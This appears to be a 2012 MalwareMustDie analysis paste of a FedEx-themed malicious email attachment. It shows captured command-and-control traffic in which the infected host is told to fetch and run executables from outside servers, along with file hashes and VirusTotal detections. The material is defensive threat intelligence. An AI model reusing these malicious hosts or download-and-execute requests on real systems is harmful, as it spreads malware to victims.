MalwareMustDie

#MMD FedEX(mail attachment - Label_Fedex_Print_document.zip)

Oct 20th, 2012
DNS:
108.236.160.217.in-addr.arpa: type PTR, class IN, s15383432.domainepardefaut.fr
sryfa.jvuydaas.tk: type A, class IN, addr 85.17.58.87

GET /2c21509821B51FE8A635B27547A4C6EE32F1AFC945611FBC3C2432BDDB871111DBC6B42D3E54F31FC40EC842203F406DC2DF061FFAD958364B3386EAD222A5E122F71DA508A105B2FF32 HTTP/1.0
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 217.160.236.108:84

HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Tue, 16 Oct 2012 19:17:59 GMT
Content-Type: text/html
Content-Length: 49
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=run&u=/get/faa91cf5e79a76602f094ed38fad5872.exe

GET //get/faa91cf5e79a76602f094ed38fad5872.exe HTTP/1.0
Accept: */*
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 217.160.236.108:84

HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Tue, 16 Oct 2012 19:17:59 GMT
Content-Type: application/x-msdos-program
Content-Length: 468480
Connection: close
Last-Modified: Tue, 16 Oct 2012 19:00:04 GMT
ETag: "ddc101-72600-4cc31c3021500"
Accept-Ranges: bytes

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

GET /api/urls/?ts=b261bdc2&affid=70300 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
Host: 175.41.28.156
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Tue, 16 Oct 2012 19:19:41 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

http://sryfa.jvuydaas.tk/update.1.0.exe?ts=b261bdc2&affid=70300

GET /update.1.0.exe?ts=b261bdc2&affid=7030 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
Host: sryfa.jvuydaas.tk
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

HTTP/1.1 200 OK
Date: Tue, 16 Oct 2012 17:16:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 15 Oct 2012 07:07:10 GMT
ETag: "13c810e-32000-afa34380"
Accept-Ranges: bytes
Content-Length: 204800
Connection: close
Content-Type: application/octet-stream

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

GET /api/stats/install/?ts=b261bdc2&affid=70300&ver=3070010&group=srs HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
Host: 175.41.28.156
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Tue, 16 Oct 2012 19:21:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 0

$ md5sum.exe 1.bin Label_Fedex_Print_document.exe 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
2c487ba4f99e1a712214977fd1b1529b *1.bin
57d9b0652f253933df251624b3965c52 *Label_Fedex_Print_document.exe
837725339650aac6625fa4a05e0e96e1 *4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe

$ ls -l 1.bin Label_Fedex_Print_document.exe 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
----------+ 1 Tom None 204800 Oct 16 22:23 1.bin
----------+ 1 Tom None 468480 Oct 16 21:19 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
----------+ 1 Tom None 53760 Oct 16 00:53 Label_Fedex_Print_document.exe


https://www.virustotal.com/file/0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb/analysis/

SHA256: 0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb
SHA1: 8ed84aca99321ca2257822bfd8814b87e89aaa27
MD5: 57d9b0652f253933df251624b3965c52
File size: 52.5 KB ( 53760 bytes )
File name: 1350392715.Label_Fedex_Print_document.exe
File type: Win32 EXE
Tags: peexe bobsoft
Detection ratio: 10 / 43
Analysis date: 2012-10-16 13:03:27 UTC ( 7 hours, 30 minutes ago )

Avast Win32:Trojan-gen 20121016
ESET-NOD32 a variant of Win32/Injector.XTQ 20121016
Ikarus Trojan.Win32.FakeAV 20121016
Kaspersky HEUR:Trojan.Win32.Generic 20121016
Kingsoft Win32.Troj.Undef.(kcloud) 20121008
Norman W32/Kryptik.BVX 20121016
Sophos Troj/Agent-YGO 20121016
Symantec Trojan.Fakeavlock 20121016
TrendMicro BKDR_ANDROM.AR 20121016
TrendMicro-HouseCall BKDR_ANDROM.AR 20121016

https://www.virustotal.com/file/0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb/analysis/1350419657/

SHA256: 0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb
SHA1: 8ed84aca99321ca2257822bfd8814b87e89aaa27
MD5: 57d9b0652f253933df251624b3965c52
File size: 52.5 KB ( 53760 bytes )
File name: Label_Fedex_Print_document.exe
File type: Win32 EXE
Detection ratio: 19 / 43
Analysis date: 2012-10-16 20:34:17 UTC ( 0 minutes ago )

AntiVir TR/Oficla.llooima 20121016
Avast Win32:Trojan-gen 20121016
Commtouch W32/Trojan3.EDK 20121016
ESET-NOD32 a variant of Win32/Injector.XTQ 20121016
F-Prot W32/Trojan3.EDK 20121016
Fortinet W32/Agent.YGO!tr 20121016
Ikarus Trojan.Win32.FakeAV 20121016
Kaspersky HEUR:Trojan.Win32.Generic 20121016
Kingsoft Win32.Troj.Undef.(kcloud) 20121008
McAfee Generic.tfr!cp 20121016
Microsoft TrojanDownloader:Win32/Kuluoz.B 20121016
MicroWorld-eScan Gen:Variant.Symmi.3147 20121016
Norman W32/Kryptik.BVX 20121016
Panda Suspicious file 20121016
PCTools Trojan.Fakeavlock 20121016
Sophos Troj/Agent-YGO 20121016
Symantec Trojan.Fakeavlock 20121016
TrendMicro BKDR_ANDROM.AR 20121016
TrendMicro-HouseCall BKDR_ANDROM.AR 20121016


https://www.virustotal.com/file/a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5/analysis/

SHA256: a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5
SHA1: cdc423285c40b9dcb752bbf23e96afd5a93a26ee
MD5: 2c487ba4f99e1a712214977fd1b1529b
File size: 200.0 KB ( 204800 bytes )
File name: update.1.0.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 3 / 43
Analysis date: 2012-10-16 20:35:27 UTC ( 2 minutes ago )

Fortinet W32/Krypt.ABK!tr 20121016
Kaspersky Backdoor.Win32.Papras.fts 20121016
TrendMicro-HouseCall TROJ_GEN.RC1H1JG 20121016

https://www.virustotal.com/file/a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5/analysis/1350419889/

SHA256: a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5
SHA1: cdc423285c40b9dcb752bbf23e96afd5a93a26ee
MD5: 2c487ba4f99e1a712214977fd1b1529b
File size: 200.0 KB ( 204800 bytes )
File name: 1.bin
File type: Win32 EXE
Detection ratio: 3 / 43
Analysis date: 2012-10-16 20:38:09 UTC ( 0 minutes ago )

Fortinet W32/Krypt.ABK!tr 20121016
Kaspersky Backdoor.Win32.Papras.fts 20121016
TrendMicro-HouseCall TROJ_GEN.RC1H1JG 20121016

First seen by VirusTotal
2012-10-16 15:28:54 UTC ( 5 hours, 13 minutes ago )

Last seen by VirusTotal
2012-10-16 20:39:33 UTC ( 2 minutes ago )

File names (max. 25)
1.bin
update.1.0.exe
DRWEB32.EXE
DRWEB


https://www.virustotal.com/file/63f914ce3072b60b296e9d9b4ea65a736098529e42abcd6cca1b3899fab861a6/analysis/1350419889/

SHA256: 63f914ce3072b60b296e9d9b4ea65a736098529e42abcd6cca1b3899fab861a6
SHA1: 731d256bffe4280a6c13e66b85454d01134d75ee
MD5: 837725339650aac6625fa4a05e0e96e1
File size: 457.5 KB ( 468480 bytes )
File name: 4D726CFC1DE95098002C4D7240DAA130.exe
File type: Win32 EXE
Detection ratio: 7 / 43
Analysis date: 2012-10-16 20:38:09 UTC ( 0 minutes ago )

DrWeb Trojan.Fakealert.34171 20121016
ESET-NOD32 Win32/Adware.SystemSecurity.AL 20121016
Fortinet W32/FakeAV.NTP!tr 20121016
Kaspersky UDS:DangerousObject.Multi.Generic 20121016
McAfee FakeAlert-SecurityTool.fo 20121016
MicroWorld-eScan Gen:Variant.Strictor.8753 20121016
Norman W32/FakeAV.BJTK 20121016